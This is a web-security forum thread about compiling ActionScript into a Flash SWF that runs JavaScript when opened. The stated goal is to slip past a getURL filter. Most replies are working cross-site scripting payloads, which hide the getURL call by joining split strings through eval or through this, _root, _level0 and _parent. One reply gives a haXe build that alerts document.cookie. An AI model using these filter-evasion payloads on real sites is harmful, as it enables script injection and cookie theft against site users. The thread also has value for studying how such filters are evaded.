Hi im trying to compile actionscript and turn it into a swf file.This is what i have tryed after searching for a while.




testme.as

a="get";
b="URL";
c="javascript:";
d="alert(\\'354t34t\\')";
eval(a+b+'(\''+c+d+'\')');

then i run this command---> mtasc testme.as -swf x333.swf to try to compile testme.as to a swf file.

I get this error ---> [testme.as:1: characters 0-1 : parse error Unexpected a]

Obviously something needs to go ahead of a='get'; but i have no idea.i dont know actionscript and have tryed to understand the basics of actionscript but have not figured out how to do this.Can any one help me? Thanks



Edited 1 time(s). Last edit at 12/06/2009 03:41AM by lp7.

The statement doesn't make sense

It should be
a="get";
b="URL";
c="javascript:";
d="alert(\\'bypassed\\')";
eval(a+b+'(\''+c+d+'\')');

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I think he wants to get a reference to getUrl using eval

eval("getURL")

and then use that reference as a function

eval("getURL")("javascript:alert(1)")

so it would be ok maybe..

you need to be in the same domain (allowScriptAccess)

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@sirdarckcat

Ah yeah doh, dunno why you'd even need to do that in flash though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Oh wait no that method is crazy you should just do:-

a='get';
b='URL';
c='javascript:';
d='alert(1)';
this[a+b](c+d)//OR
_root[a+b](c+d)//OR
_level0[a+b](c+d)//OR
_parent[a+b](c+d)//OR

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yes but how do i compile the actionscript code or update a
swf
with the actionscript code? i dont have adobe8 i have mtsac flare flasm. thanks

haxe

//compile.hxml
-swf-version 9
-swf xss.swf
-main XSS

//XSS.hx
class XSS {
    public static function main() {
        flash.Lib.getURL(
	    new flash.net.URLRequest("javascript:alert(document.cookie);"),"_top"
	);
    }
}

Im trying to bypass a geturl filter with this actionscript code

a="get";
b="URL";
c="javascript:";
d="alert(\\'bypassed\\')";
eval(a+b+'(\''+c+d+'\')');


OR

a='get';
b='URL';
c='javascript:';
d='alert(1)';
this[a+b](c+d)//OR
_root[a+b](c+d)//OR
_level0[a+b](c+d)//OR
_parent[a+b](c+d)//OR


Can i use haxe or flasm or wtasc to make a swf file out of it so when the swf is opend that code is executed.? thanks